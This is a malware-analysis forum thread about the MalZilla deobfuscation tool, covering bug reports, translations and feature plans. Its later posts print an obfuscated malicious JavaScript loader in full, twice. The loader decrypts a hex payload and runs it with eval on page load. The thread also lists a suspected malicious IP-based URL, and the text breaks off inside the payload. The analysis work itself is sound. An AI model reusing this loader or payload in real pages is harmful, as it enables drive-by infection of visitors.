Malware Domain List

Malware Related => Tools of the trade / Internet News => Topic started by: JohnC on August 19, 2007, 01:06:20 pm

Title: MalZilla
Post by: JohnC on August 19, 2007, 01:06:20 pm
Web pages that contain exploits often use a series of redirects and obfuscated code to make it more difficult for somebody to follow. MalZilla is a useful program for use in exploring malicious pages. It allows you to choose your own user agent and referrer, and has the ability to use proxies. It shows you the full source of webpages and all the HTTP headers. It gives you various decoders to try and deobfuscate javascript aswell.

It was previously released only as a private beta, but has now moved to a public beta stage. You can download MalZilla at the MalZilla sourceforge page here (http://malzilla.sourceforge.net/).

There is a guide for using MalZilla made available here http://malzilla.sourceforge.net/tutorial_01/index.html
Title: Re: MalZilla
Post by: bobby on October 09, 2007, 08:27:09 pm
Malzilla updated to 0.9.2
Also a new tutorial in Documents section.

http://malzilla.sourceforge.net/
Title: Re: MalZilla
Post by: bobby on October 10, 2007, 08:28:54 pm
I apologize, 0.9.2 was a broken release :(
Fixed and uploaded as 0.9.2.1
The download mirrors will be updated (hopefully) in one hour.
Title: Re: MalZilla
Post by: bobby on January 20, 2008, 04:05:31 pm
Anyone willing to translate Malzilla to other languages?

I'm preparing next release, and I would like to include a couple of translations with the release.

There is some 200 strings to translate. Unicode is supported, so one can even translate to Chinese or Arabic.
Translation tool is also available.

I'm still polishing the interface, so the string list is still not complete, but if anyone applies for translating, I would prepare the list in ~10 days.
Title: Re: MalZilla
Post by: sowhat-x on January 21, 2008, 04:03:37 am
I'll try my best to get an exact translation for Greek,
whenever you think the strings' list is ready,pass it over...  :)
Title: Re: MalZilla
Post by: bobby on February 10, 2008, 01:25:59 am
I apologize for late reply.
I have uploaded a 0.9.3 pre-release on http://malzilla.sourceforge.net/

Please try to play a bit with translation, and tell me if buttons/labels are big enough for the translated text to fit in.
If not, I would need to play a bit with buttons size or with font size.

Translator folder contains a basic translating tool. It is still not polished, as it shows the resource numbers, but I've coded it today and didn't have time to make it better.
The uploaded default.lng is also done in hurry, it does not contain the messages and dialogs, but it is good enough to test the interface/GUI translation.
Title: Re: MalZilla
Post by: tjs on February 12, 2008, 10:35:23 pm
Thanks, Bobby!

Do you prefer if we post bugs & suggestions here or on the sourceforge forum? I've already found a few in 0.9.3pre.

TJS
Title: Re: MalZilla
Post by: bobby on February 13, 2008, 04:44:40 am
Thanks, Bobby!

Do you prefer if we post bugs & suggestions here or on the sourceforge forum? I've already found a few in 0.9.3pre.

TJS
Hi TJS,

I check both forums every day, so both are equally good for posting bugs & suggestions.

regards
bobby
Title: Re: MalZilla
Post by: jimmyleo on February 13, 2008, 06:21:37 am
chinese_simply language ready! ;D
mailed to u, bobby~
Title: Re: MalZilla
Post by: sowhat-x on February 13, 2008, 06:35:57 am
Lol,jimmyleo...was it that easy doing it under chinese?What's your secret?  :)
Damn it...'cause I've run into quite a bit of trouble doing this for greek,
not only I couldn't find the equivalent technical terms,
but the resulting boxes should be huge afterwards...I'll see what can be done...  :-\
Title: Re: MalZilla
Post by: jimmyleo on February 13, 2008, 07:29:28 am
hi sowhat-x,
I only couldn't found "find" resource ID in "decoder" tab...
and some of them should be wider for better presentation.
I translated most of them, and only little hasn't been translated.because they are reseved in Chinese.
and some of technical names which I know maybe my FreShow experience :P
Title: Re: MalZilla
Post by: tjs on February 14, 2008, 05:41:21 pm
Hello Bobby,

Here are some issues and suggestions inspired by your latest pre-release of malzilla.

Update version number not in sync (reads 0.921 instead  of 0.9.2.1)
Clipboard doesnt work properly (on vista)
  - functional but throws an error
  - locks clipboard in other apps [this is annoying]
  - Suggestion: clipboard feature disabled by default
Regression from previous version url no longer opens without http or www
  - Suggestion: add support for hxxp, default to http for protocol and support non www.* links (ex. blah.com)
Suggestion: Option to enable/disable hilighting
Suggestion: Option to hide/show comments (<!-- -->) [some obfuscation puts them everywhere]
Hex viewunder download tab is agreat idea-- what's the point of the 'hex view' tab?

Thank you very much for your hard work on this great utility!
tjs
Title: Re: MalZilla
Post by: bobby on February 14, 2008, 07:08:47 pm
@jimmyleo
This pre-release was just a test to see how the translating engine is working. There is more strings missing in that default.lng file.
I will release a complete list at the moment we know which features will get into 0.9.3 release.

@TJS,

About the minor issues:

====
- version number does not matter at the moment as long as you know if you have the newest version. You see, there is a HTML file on the Malzilla's site that contains a string with current version number. I can convert a string to float, and compare it with a number stored as variable in Malzilla. Thats how it is done, and thats why the version is stored as 0.921 (float, floating point number).
If I would like to report it in the form of 0.9.2.1 I would need to write a parser and extra code for comparing these version numbers. I'll keep it simple for now.

====
- about URLs and annoying messages - I did try to prevent the user to enter FTP or HTTPS URLs, as the Malzilla gets stuck for a long time if one is entered. Malzilla does not support these protocols, neither it will support.
I'll code it in different way, as it is really annoying as it is.

===
- Enable/Disable Highlighters - will be done. If I get enough time I'll also make them configurable (select colors the way you like).

====
- Hex View under Download tab is just an experiment. I wanted to see how useful/useless it can be. Let the both Hex Views stay where they are, and we will see in the next release which one is for TrashCan.



About the major issues:

====
- Clipboard monitor is really a pain. It is useful if you copy a long list from some forum/site, but it is a pain as it also gets triggered at internal copy/paste in Malzilla.
Also, there is some bug (not in my code, maybe Delphi or Windows) that triggers the Clipboard Monitor twice for each URL on the clipboard. Thats why it clears clipboard after URL is detected and pasted to the list.
Hmmm... I was thinking that I solved that locking of Clipboard for other applications (in the fact - clearing the clipboard, not really locking).
I will get back to this Clipboard Monitor latter, I have some more important thing to do first.
Can you give me some info which error it triggers on Vista? I do not have Vista, all is done on XP (half-working Linux version is also there)

====
- Hide comments - this one will need some coding. See my list of priorities (follows in this post).



ToDo list:

====
Lately I see a lot of scripts using arguments.calee().toString in a way which obviously gives very funny results in Malzilla.
(I guess all of you already knows this, but...) arguments.calee().toString differs between SpiderMonkey (Mozilla, FireFox, Malzilla...) and Internet Explorer.
As I see, a lot of scripts I'm seeing lately are using this in the way that is making the script "IE-only".
I already know what to try, I just need some time to test my idea.

====
History/Log/Case - no, that are not 3 options needed, it is just one feature. I received a request of keeping tracks what and how was something done and to group things in something like a Project/Case.
Guess I'll do it in the form of a button "Start/stop logging", where every action will be recorded (URLs, HTML content, decoded content etc. etc.). I think this would be very useful feature.

====
More Download tabs (something like tabbed browsing in FireFox). Well, it sounds complicated to me to have unlimited number of tabs (a looooot of coding needed, and there is a danger of memory leaks), so I'm thinking about having some 5 (or say 10) Download tabs that the user can open.



btw. did someone already saw the debugger? :) (just type some nonsense in Decode tab, and try to run the script)
It wasn't intended to be there in this pre-release, but I forgot to disable it before doing the upload.
Unfortunately, you got half-backed debugger, as some options were disabled.

This debugger is not my code, it is part of the wrapper I use to access SpiderMonkey, but it seems that nobody from the team who published the wrapper knows how to use/access this debugger from the program code (I asked on the mailing list), so I'm on my own here.
Title: Re: MalZilla
Post by: tjs on February 14, 2008, 08:08:14 pm
I just did some testing on XP and noticed that the clipboard issue occurs here too. When I click 'send script to decoder' in the text tab, I occasionally get an error from malzilla saying it cannot open the clipboard. On vista, I get this error when I start the application sometimes as well.

As for the debugger, I like it, but I think it should be integrated as another tab instead of a popup... Specially because it's not always useful (particulary when you have multiple nested obfuscated scripts). In many cases it throws errors about 2nd degree script variables not being defined, even though the obfuscation is properly decoded in the decode tab. I'd rather not have to close the debugger every time I run a script.

Maybe you can make the debugger configurable (whether to use it or not)...

Also, a random point, I HIGHLY recommend that you set 'clear cache on exit' as default. The cache is usually full of malware and AV scanners hate it.

TJS
Title: Re: MalZilla
Post by: bobby on February 14, 2008, 08:52:13 pm
@tjs
I just changed the code for Send script to decoder. It does not use Clipboard anymore.
About errors with Clipboard, I didn't have any of them here, so I have no idea whats wrong. Maybe it is a conflict with some software you use on both XP and Vista.

As for debugger - it is external code, programed in a such way that it can't be so easy transformed into another tab.
Only thing I can do is a checkbox 'debug', where you can chose to use debugger or not, or a separate button for debugging.

As for Clear cache on exit - I can do it if you prefer so. I prefer not to clear the Cache, and I do not run any AV on this PC (with some 50GB of malware on my HDD, AV would go crazy).
Title: Re: MalZilla
Post by: tjs on February 15, 2008, 01:55:06 am
Debugger:
I like the idea of a seperate button or control to decide whether or not to use the debugger.

Cache:
I understand your point. I also don't run any AV scanners on the machines that I do analysis on. I just don't see the value of persisting the cache between sessions. It's not like the performance tradeoff is that valueable anyway (I don't mind if you have to redownload pages every time- after all, we're looking for malware, not browsing the web).

Clipboard:
I'll investigate further, but i'm not really running anything unusual on either of my analysis machines. Maybe I'm infected with something that is hooking the clipboard ;)

TJS
Title: Re: MalZilla
Post by: jimmyleo on February 15, 2008, 02:50:02 am
No problem. When the full-string is ready, just mention me.

and about the Clipboard Monitor problem. I've came across it sometimes under Vista. Just as click "send to decoder" popups "can't open clipboard".

debugger is a bonus originally.  ::) I found it in one analysis condition.

I also recommend that clipboard feature disabled by default. because when I use other tools it made me confused.

best regards,
jimmyleo
Title: Re: MalZilla
Post by: tjs on February 15, 2008, 06:44:31 pm
I'm running into a new issue with 0.9.2.1pre

I constantly paste URLs without www or http by mistake (usually IP based) causing Malzilla to throw the malformed URL msgbox, but today while trying the following IP, I got a new error:

(X) Access violation at address 004eba13 in module malzilla.exe. Read of address 00000000

Can anyone else repro this bug?
208.72.168.176/e-Z1odey0312/index.php

Thanks,
TJS
Title: Re: MalZilla
Post by: bobby on February 15, 2008, 07:22:02 pm
Did there was anything on that address at the time you try it, or it was a 404 error page?

If there was some content, can you please upload it for me to test it?

I did have some Read of address 00000000 errors while trying to integrate the debugger.
All the errors were related to the package I use for dealing with Unicode strings:
http://mh-nexus.de/tntunicodecontrols.htm
so, not really my fault, but I can at least do something to prevent the Malzilla's crash if I can localize the error you got.
Title: Re: MalZilla
Post by: sowhat-x on February 16, 2008, 08:42:09 am
...only 1 request here...what jimmyleo already said about clipboard monitor being disabled by default:
copy/pasting http addresses in the 'URL' box has caused me a quite a bit of trouble in occasion,
i think it happens sometimes when an address is already filled there,
and someone tries to copy/paste a partial address there (without the http prefix),
not sure,I'll have to dig a bit more to check exactly when this happens (under v0.921)  :(
And the clipboard monitor feature in 0.93 beta makes it quite a bit more confusing...  :P
Title: Re: MalZilla
Post by: bobby on February 16, 2008, 08:58:03 am
http://rapidshare.com/files/92273310/malzilla.zip.html

Please test the changes I made.
I will drop Clipboard Monitor in the future. I'll try replace its functionality in some other way.
Title: Re: MalZilla
Post by: sowhat-x on February 16, 2008, 09:10:26 am
Ha-ha -> less than 16 minutes...this must be the fastest bugfix response I've ever seen!  ;D
Yeap,at least under a first quick glance,copy/pasting urls in this build,
seems to be working in a much better and simpler way...  ::) :)
Title: Re: MalZilla
Post by: bobby on February 17, 2008, 08:59:26 am
Grrrr....
Take a look at the script in the attachment (pass= infected).

It is a modified Caesar cipher, that means trivial, but...
The decryption key is created on the fly, and it depends on the function length (arguments.calee thing).

The function is full with redundant operations and variables (used nowhere), just to make the analyst mad.

That is the kind of script I mentioned a couple of posts ago:
Quote
ToDo list:

====
Lately I see a lot of scripts using arguments.calee().toString in a way which obviously gives very funny results in Malzilla.
(I guess all of you already knows this, but...) arguments.calee().toString differs between SpiderMonkey (Mozilla, FireFox, Malzilla...) and Internet Explorer.
As I see, a lot of scripts I'm seeing lately are using this in the way that is making the script "IE-only".
I already know what to try, I just need some time to test my idea.

Can someone help in deciphering this?
I would like to include decoding for such scripts in Malzilla.

If anyone is interested, I would like to share my findings.
Last night I tried to write a PScript for brute-forcing it, but PScript misses a lot of functions I need for this.
If I get some time today, I'll try to code one brute-forcer for this (EXE, not script).
Title: Re: MalZilla
Post by: Drusepth on February 18, 2008, 05:10:54 am
I'm working on analyzing the script right now (finally, something I might know how to do! :)), but I just wanted to point out if you just wanted to find out what it is that the function is running, you can take a glimpse at the very end:
Code: [Select]
eval(h8TbWsRTn);}It's going to run whatever is in the h7TbWsRTn variable (this is after it's been decrypted).  Instead, we can modify the code to just print it out to the screen:
Code: [Select]
document.write(h8TbWsRTn);}But, this doesn't come out clean:
Quote from: Output
elkMvmrlCc_Sn;fri%QJp[LR:G.+y_q^0f7f36<`'cvjsl\k^u2f_kcbO0xrQsifXi,,,q\mVcgh&.STi0*%(%qYWtscq:^]g,,9uXo s5:a0GM2S?y_qA!m67KtNC%xeuf[4]89|3n4^0f7f36<`niqes_8`cv#_d-U"wf{K:m^\"qYOQak.vx@%&2sKt${06je,7Lj;m\t Cvu_x&%hsu&C.h6QxUE4-%F;n03DrAH@5352A!m67KtNC--{06je,7LjYC.h6QxUET:=zdph.!e5SNGH:=jrp';4U48PsV=:4<>B6b/OyZD:;4U48PsV=;(?5,zh.!e5SNGH:s5:a0GM2SBA<0 [*u45b(M:JU)/(60#:<571*5<4,9efokPJj4HLOYA39hCDV7URcV3/8?lJFc2;QiZ)<;4U48PsV='+$~v1.pRD9KeZ`I1n9TMdN(.9o52LlT0_A+v1.pRD9KeZ`I1n9TMdNZHs5:a0GM2S->ge%b4;vfA,EQ]mOEk,N9g[.B6b/OyZD\9 2-#yw)4]jF8FfRf6Ip8ON\TF;n03DrAHa.;3)6;::08-8gdc5O5_d|P;3)6;::08,8Pqv+o0.`RTKO<'8[3;f/OGE;>kg5r-2c7s>o0.`RTKO*"&eci9V7l_bOA{06je,7LjY'Xb Z\te|&(2sKt$jb6j3{9r;`\3B:yevL%iOpkwf:]l\*H:i1+J_YJ@.:;4U48PsV=9"=H:i1+J_YJ.)(x`cv#Fb(-G|56<^a!u:8w4f(.9o52LlT0=jwS1ZtLT^B6b/OyZD\4.%hxX0bn14R_G5j)17w[I[<'8`cv#BAD@O2X53:m^\"LpOAX_Ns:>t`i;zLPaw_0=kg5r-2c7s@eGcU8UGMB-cbXixk9PoE7e|k114dN9w93x,l%XTvR3>4=nA4/1*8@RwW2F.PV?U{FLZuR56>dni%.9o52LlT0?4>B6b/OyZD;^a!u:8w4f8.9o52LlT0-A5'zm^\"{\1G[cAyk@eGcU8UGMB-jrLuxu&C.h6QxUE#/=HEKB\->49@n`ipOKrw&vP02fjZuf#. +?KkP9^Lfu9;C9J-g4W04$c^:EDo2FeEQWoMG+2X:a>geEWSFd`ch3&2-#yGdN,cfgo54EWSFd`ch34999|dS;TnqBsk('Uxugm^+PtspAgXo-qhh&GdN,cfgo5 8;zLPaw_0-/>TOjQI;Vj<*5#3?ld'FPVQL73m/9Pv4=nA4.8)8PvY5av+G:]H:i1+J_YJ`;1'8g"ioqdx9UpRF3,k"?4>TOjQI;Vj<;4U48PsV=8giy_kj@SVmlCkq= JelNT:lvp'0P6G7_`/6KC882A04P;4E56/30;i<35*3086d3@(6Mc;d/@/^d:9D8,>,;;<3A.6!:;db8.> ;;D0a.2K88e28,>,;fD2a.28F:a2]15j6C3Z^":j;d@/408<75,2O86916:6Kc<<38-6D8d_`)>.788B6\0P6G7_@/5 :4D?703"ciD05'>-;;d67+> D:e1896,c;d6`/2+88e2@+6-789.5*2:5e35=3,89976.39;:15048F8?A,3P9::05/3K8;9?683#9;:34/^8j936-3K9::5593#8F9A6,2"d4:c5,3/899B6.3 99:25.20;<6aZ3C7e/@)6Oc4<67-6+cfDB8-3c<;/8(>":<:58<6K7F9D4'0M)->

So right now I'm looking at the code to see how it is actually working.  It'll take a tiny bit longer than normal, since I have to look up certain syntaxes for things that the writer used that are ridiculous ("variable2 = (variable2>>>1)^((variable2 & 1) ? 3988292384 : 0);") and I still don't fully understand how the deprecated .callee function works.

Anyway, first I'm just cleaning up the code.  I'm posting each step in case I make a mistake, someone else can catch it and carry on their own work from there or something.

Step 1: Get syntax back and make it look "clean" (indentation, spaces, etc)
Code: [Select]
<html>
<script language="JavaScript">
<!--
function nlR1sYAdQ (dp58428V3) {
var m6K3yhq2K=arguments.callee.toString().replace(/\W/g,'').toUpperCase();
var A7ck1Wh8H;
var B2t331TL0;
var NisOkeH61 = m6K3yhq2K.length;
var Xn47RT3Sm;
var h8TbWsRTn='';
var PkKX3bWF0 = new Array();
for (B2t331TL0 = 0; B2t331TL0 < 256; B2t331TL0++) {
PkKX3bWF0[B2t331TL0]=0;
}
var A7ck1Wh8H = 1;
for (B2t331TL0 = 128; B2t331TL0; B2t331TL0 >>= 1) {
A7ck1Wh8H = (A7ck1Wh8H>>>1)^((A7ck1Wh8H&1)?3988292384:0);
for (i5G3CC1F6=0; i5G3CC1F6 < 256; i5G3CC1F6 += (B2t331TL0 * 2)) {
PkKX3bWF0[i5G3CC1F6 + B2t331TL0] = (PkKX3bWF0[i5G3CC1F6]^A7ck1Wh8H);
if (PkKX3bWF0[i5G3CC1F6+B2t331TL0] < 0) {
PkKX3bWF0[i5G3CC1F6 + B2t331TL0] += 4294967296;
}
}
}
Xn47RT3Sm = 4294967295;
for(A7ck1Wh8H = 0; A7ck1Wh8H < NisOkeH61; A7ck1Wh8H++) {
Xn47RT3Sm = PkKX3bWF0[(Xn47RT3Sm^m6K3yhq2K.charCodeAt(A7ck1Wh8H))&255]^((Xn47RT3Sm>>8)&16777215);
}
var eXK5vvK0K = new Array();
var Y37iVA85C = 2323;
Xn47RT3Sm = Xn47RT3Sm^4294967295;
if (Xn47RT3Sm < 0) {
Xn47RT3Sm += 4294967296;
}
Xn47RT3Sm = Xn47RT3Sm.toString(16).toUpperCase();
var sNImKPP0N = new Array();
var NisOkeH61 = Xn47RT3Sm.length;
for (B2t331TL0=0; B2t331TL0 < 8; B2t331TL0++) {
var LS0E1DrB3 = NisOkeH61+B2t331TL0;
eXK5vvK0K[B2t331TL0] = 1;
eXK5vvK0K[B2t331TL0] = Y37iVA85C;
if (LS0E1DrB3 >= 8) {
LS0E1DrB3 = LS0E1DrB3 - 8;
sNImKPP0N[B2t331TL0] = Xn47RT3Sm.charCodeAt(LS0E1DrB3);
} else {
sNImKPP0N[B2t331TL0] = 48;
}
}
var vM4s1CVcM = 0;
var ahE3xpv6w;
var L3KsBg108;
var v65y6Hs6a;
NisOkeH61 = dp58428V3.length;
v65y6Hs6a = NisOkeH61;
Y37iVA85C = 1123;
Y37iVA85C = v65y6Hs6a;
for (B2t331TL0 = 0; B2t331TL0 < NisOkeH61; B2t331TL0 += 2){
var QgQRdYhu8 = dp58428V3.substr(B2t331TL0, 2);
ahE3xpv6w = parseInt(QgQRdYhu8,16);
L3KsBg108 = ahE3xpv6w - sNImKPP0N[vM4s1CVcM];
if (L3KsBg108 < 0) {
L3KsBg108 = L3KsBg108 + 256;
}
h8TbWsRTn += String.fromCharCode(L3KsBg108);
v65y6Hs6a++;
Y37iVA85C = 3891;
if (vM4s1CVcM < sNImKPP0N.length - 1) {
vM4s1CVcM++;
Y37iVA85C = 1092;
eXK5vvK0K[B2t331TL0] = 20;
} else {
vM4s1CVcM=0;
Y37iVA85C=B2t331TL0;
}
}
eval(h8TbWsRTn);
}
//-->
</script>
<body onLoad="nlR1sYAdQ('AAae9e93b79EA8A3648596a5949f719DB7ab58978BA19183977C7A746Cb0af96B6599176a7689c6a7b7e936Da4a7a0aab19E9EA4b6639C96b0A5959571a9A888B8AB999Eaa5d6263b69EA09cA4989e5d7395875faa61605c6d67A49F98A5a99Ab67C91a3A85D6270ba9aa250B4667098758980789470AF96b6597467ae676d82B990766Bb996ab55ab9d67a3796ab26Ab3769176a7689C6a7B7E935EAF9AA79cB8A16BA6A4a75996a96f8868B897B1827fAF91A263a28F8696a39E74B7a9765C6B74a691b555B1677BAC9872787DA072B29ea75084a7AB96bd61596bA9a4AB5d88709B627782ae8C8A76606b876ca4677886A58789716b6A7A747467AE676d82B990765B6e5eb1677BAC9872787da09088709B627782ae8C8a966D607EAB9AA764AA6167a66689858c8a6d617E9ba8a76C7D679B756986AA9B7F6D61756d74797Ba4626490aa907b7F7d679b756986aa9B7F6E6e80666255BFAA6167A66689858c8A6d58b4667098758980789473777375628e586Ba66A6cA76A80808B865f666D7863697B6D6b6e766C68647d656270aaA8A258AC8180a1798a7f959a726970AD85779c7886889a9B7562657970A2818Ba56581929A9060817d679b756986aa9B7F5a626C55b4AD7670A398856a819C9fa27c77AF6a8A84A9905b747aa06b6991ae8776a07261AD7670A398856a819C9fA27C77AF6a8A84a9908d8Eb466709875898078945e749eaa5958A8756CAC9D866e78979E9e857Cb06e817fA88C64797bA4626490aa907BA1596C50735e59B0bc6B67A3AB776E7DAB94997c8Aa16E86939E875B876Ca4677886a58789926472786B69647c6b70677d6F6BADC0b29a9A7a9168A5a5ad8672786b69647C6b70677d6E6B96B2a761A6757093619385818681696bA1746c9c66948978817f9C9d6cb76F65a978A474A675709361938581866f6459ABA49A6F8d7CAE92A89072b1677bac9872787DA0906C9a95669b6dAE97bc868e9189996C98797075937198A196b67C9f94a876AD5DB56A67937485897D95625956756a6E92a2615891a86B916db99ba87d8173715E6A6a66677a6c6B6679626bADB996AB55AAad8562A6AC6d7F94769E95ba557AA7b69aA9586c70af96B6598680b6896D7C7b8c9C6d75686B687F9A95669B6dAE97BC866D91a86B916DB99ba87da1696B6e78726667756e6e70AD9F5058A49a6f8d7CAE92A89071695e64B49195798D71aaa6b17d5B80696b6E78726667756e6F70C19A95669b6dae97BC866d91A86B916DB99bA87D71A9a888B8ab999Eaa5d6a6B6D67A49F98A5a99aB67c91A3a85d6270ba9AA250A9A9717685aa637FAB72A79aBB5971a2b596B25D6D74a691B555a0997bAC6665BC6aA872a59e66887bAA9bAD91679C95b19cAD9D7F9F9fa26b7970A0766d7dA59a7b76657f7d679b756986aa9b7F6c687E7970A0766D7DA59a7B64606D59aba6a4a7597Da76A606288AD6B6d81A09467b66b6eAE79a85b747Aa06B6991AE87767E9Bad8A769Ca7648d8594797BA4626490aa907ba176616BA9a98e67a7b0647A93907D6Caf6B647dB88C7F92818F80A39769806c97a56B99A955617Da76a606288AD6B6d8276685963b0819875696275bb6771728c9c6160757Ab1677C66686Ba9a9717685AA637fAB907D6caf6B647dB88C7f92819A95669b6dae97BC865E93ab96AB78b39D9571b75d819875696275bb67715E7fB65095AFa89e55BF9FA4688476AA6893a18B747Aa06b6991AE8776a0726d6D7Fb6ada6a4a7598497A57F78776aA76D81696BA6A4a759798686739573896B6a7FAF91A2637dA686869a9294b46B74abA5ab5081bb7d8698BCA163627e9C9d6cb76f65A978a4769c8cA5887e9678837972A5959EAAA9A17095B1787Da6adA168767697947AA86F6Abd6e9f6b9985AC8978806783AF726a66766c6b8693A88D698b70839C8086b17d919ca8987667749BB3AB58747aA06b6991ae8776806574797BA4626490AA907B80a09467b66B6Eae79a86b747Aa06b6991ae87766E726B5ebfaf91a263ac92688c9d9687BA9c769C8cA5887E9678837972ACa592B6A9ab5D88709B627782ae8C8a6562597E797B82879E6084756A76a5a5ABa3958cA3AD5DBB926378A79b90ACAB6561666c7081a2957B9192a7a66f72887b7d73A8658d67796696a47b767aA67788988B9288A5848C6d659e7B92749Eaa61789d94779A97A8aa666C735E59B08cA68172A4979dA67a76789D94779a97a8AA665B756A6f70C1a68681959fa779b8ad5B6D96A9ab9eB2A05E96B5A4a678ac9aa273b2999e5D8Ca68172a4979da67a626b81BB7d8698bcA163626e60748b94ac84648A6c8ca1816C68697470A29B6C88839C927D6d6Ab2716c96B76d7a76B56c7F9871A19Ea3ABad985d745e59B0938c9c7f8B696eA37c645B6B9985AC8978806783af726A657D6b6B96b78a6b98bb6d7A809e7970a0766D7dA59a7B967276696Bad639aA5a8a959AB7f96A1887d786e9E688065748b94ac84648A6c8CA1817d679b756986aa9b7f6badc09Aaf96B0619D869487A3a388adA4597eb24381aaAE819a7b9Daca76c60639677786D96A571699184696e69867267967C657b6C7b7166767c9A726a7A6c667679679a6a856a6993a46c9a6685719160a56B6F7B7d6e71727C6c726a867069677B6c9a997D7071667c6c7A67a670659179699B697d6E71727C977A69A670656479777098779F6463769B6C7A789c91687B9B719B85716776796d7a65856d6660856a7A6BA56F6771a46b9a6d866e6972A4699B6bA56f699578766e6ba59F6963A5659a6da57069717C6e726E7a6e659579676f687b7c6991a46D726a7d6F696585699A96A56B717478696e797B9E639677786d96857168667b657a767c726668A49a7a677A6971737C6C9a6D7c6d7166856b9b687D7b6972a46c9A6dA571657179699b69856D697378696F657A6C65647B669b6a7A7f6672796a6f6e7b7066637a6C70687a72676179776E76866e66967A6B70677A716691796C6f767B7A66697a6c706a79719161799B6F6a7B6f66917a6B706C7a7b666979776F787b6E6568A565709a7A6E6675796A6f797B7066667A6A70697A7065767c6D9A65a56d6969A4667a76796d666279796d66789D637677786D767D6F91687c6a9a6e86696967A5657b6a7a696972a466726da69c666084689B66856b6995A465726D7C6f6971A4977a797D6F6661a46D71667D6a71687B6d706c7D7e699178776F7B796963936A5E74')">

</body>
</html>

Step 2: Replace variable names with normal ones, and remove obvious redundancy
Code: [Select]
<html>
<script language="JavaScript">
<!--
function thefunction (parameter) {
var variable1 = arguments.callee.toString().replace(/\W/g,'').toUpperCase();
var i; // Used in for loops
var variable4 = variable1.length; // .lengths of various vars
var variable6 = '';
var array1 = new Array();
for (i = 0; i < 256; i++) {
array1[i] = 0;
}
var variable2 = 1;
for (i = 128; i; i >>= 1) {
variable2 = (variable2>>>1)^((variable2 & 1) ? 3988292384 : 0);
for (j = 0; j < 256; j += (i * 2)) {
array1[j + i] = (array1[j]^variable2);
if (array1[j+i] < 0) {
array1[j + i] += 4294967296;
}
}
}
var variable5 = 4294967295;
for(variable2 = 0; variable2 < variable4; variable2++) {
variable5 = array1[(variable5^variable1.charCodeAt(variable2))&255]^((variable5>>8)&16777215);
}
var array2 = new Array();
variable5 = variable5^4294967295;
if (variable5 < 0) {
variable5 += 4294967296;
}
variable5 = variable5.toString(16).toUpperCase();
var array3 = new Array();
var variable4 = variable5.length;
for (i = 0; i < 8; i++) {
var variable7 = variable4 + i;
array2[i] = 1;
array2[i] = '';
if (variable7 >= 8) {
variable7 = variable7 - 8;
array3[i] = variable5.charCodeAt(variable7);
} else {
array3[i] = 48;
}
}

var variable8 = 0;
var variable10;
variable4 = parameter.length;
var variable13 = 3891;
var variable11 = variable4;
for (i = 0; i < variable4; i += 2){
var variable12 = parameter.substr(i, 2);
variable10 = parseInt(variable12, 16);
if (variable10 < 0) {
variable10 = variable10 + 256;
}
variable6 += String.fromCharCode(variable10);
variable11++;
if (variable8 < array3.length - 1) {
variable8++;
variable13 = 1092;
array2[i] = 20;
} else {
variable8 = 0;
variable13 = i;
}
}
eval(variable6);
}
//-->
</script>
<body onLoad="thefunction('AAae9e93b79EA8A3648596a5949f719DB7ab58978BA19183977C7A746Cb0af96B6599176a7689c6a7b7e936Da4a7a0aab19E9EA4b6639C96b0A5959571a9A888B8AB999Eaa5d6263b69EA09cA4989e5d7395875faa61605c6d67A49F98A5a99Ab67C91a3A85D6270ba9aa250B4667098758980789470AF96b6597467ae676d82B990766Bb996ab55ab9d67a3796ab26Ab3769176a7689C6a7B7E935EAF9AA79cB8A16BA6A4a75996a96f8868B897B1827fAF91A263a28F8696a39E74B7a9765C6B74a691b555B1677BAC9872787DA072B29ea75084a7AB96bd61596bA9a4AB5d88709B627782ae8C8A76606b876ca4677886A58789716b6A7A747467AE676d82B990765B6e5eb1677BAC9872787da09088709B627782ae8C8a966D607EAB9AA764AA6167a66689858c8a6d617E9ba8a76C7D679B756986AA9B7F6D61756d74797Ba4626490aa907b7F7d679b756986aa9B7F6E6e80666255BFAA6167A66689858c8A6d58b4667098758980789473777375628e586Ba66A6cA76A80808B865f666D7863697B6D6b6e766C68647d656270aaA8A258AC8180a1798a7f959a726970AD85779c7886889a9B7562657970A2818Ba56581929A9060817d679b756986aa9B7F5a626C55b4AD7670A398856a819C9fa27c77AF6a8A84A9905b747aa06b6991ae8776a07261AD7670A398856a819C9fA27C77AF6a8A84a9908d8Eb466709875898078945e749eaa5958A8756CAC9D866e78979E9e857Cb06e817fA88C64797bA4626490aa907BA1596C50735e59B0bc6B67A3AB776E7DAB94997c8Aa16E86939E875B876Ca4677886a58789926472786B69647c6b70677d6F6BADC0b29a9A7a9168A5a5ad8672786b69647C6b70677d6E6B96B2a761A6757093619385818681696bA1746c9c66948978817f9C9d6cb76F65a978A474A675709361938581866f6459ABA49A6F8d7CAE92A89072b1677bac9872787DA0906C9a95669b6dAE97bc868e9189996C98797075937198A196b67C9f94a876AD5DB56A67937485897D95625956756a6E92a2615891a86B916db99ba87d8173715E6A6a66677a6c6B6679626bADB996AB55AAad8562A6AC6d7F94769E95ba557AA7b69aA9586c70af96B6598680b6896D7C7b8c9C6d75686B687F9A95669B6dAE97BC866D91a86B916DB99ba87da1696B6e78726667756e6e70AD9F5058A49a6f8d7CAE92A89071695e64B49195798D71aaa6b17d5B80696b6E78726667756e6F70C19A95669b6dae97BC866d91A86B916DB99bA87D71A9a888B8ab999Eaa5d6a6B6D67A49F98A5a99aB67c91A3a85d6270ba9AA250A9A9717685aa637FAB72A79aBB5971a2b596B25D6D74a691B555a0997bAC6665BC6aA872a59e66887bAA9bAD91679C95b19cAD9D7F9F9fa26b7970A0766d7dA59a7b76657f7d679b756986aa9b7F6c687E7970A0766D7DA59a7B64606D59aba6a4a7597Da76A606288AD6B6d81A09467b66b6eAE79a85b747Aa06B6991AE87767E9Bad8A769Ca7648d8594797BA4626490aa907ba176616BA9a98e67a7b0647A93907D6Caf6B647dB88C7F92818F80A39769806c97a56B99A955617Da76a606288AD6B6d8276685963b0819875696275bb6771728c9c6160757Ab1677C66686Ba9a9717685AA637fAB907D6caf6B647dB88C7f92819A95669b6dae97BC865E93ab96AB78b39D9571b75d819875696275bb67715E7fB65095AFa89e55BF9FA4688476AA6893a18B747Aa06b6991AE8776a0726d6D7Fb6ada6a4a7598497A57F78776aA76D81696BA6A4a759798686739573896B6a7FAF91A2637dA686869a9294b46B74abA5ab5081bb7d8698BCA163627e9C9d6cb76f65A978a4769c8cA5887e9678837972A5959EAAA9A17095B1787Da6adA168767697947AA86F6Abd6e9f6b9985AC8978806783AF726a66766c6b8693A88D698b70839C8086b17d919ca8987667749BB3AB58747aA06b6991ae8776806574797BA4626490AA907B80a0946